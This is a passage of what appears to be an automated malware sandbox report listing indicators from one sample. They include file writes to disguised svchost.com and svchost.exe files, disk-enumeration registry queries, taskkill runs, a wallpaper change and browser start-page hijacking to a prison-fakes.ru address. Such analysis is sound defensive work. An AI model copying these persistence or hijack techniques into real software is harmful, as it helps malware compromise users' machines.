| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\Pattern | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Search Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Internet Explorer\Desktop\General | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Dragon\\Desktop\\trollface1.jpg" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
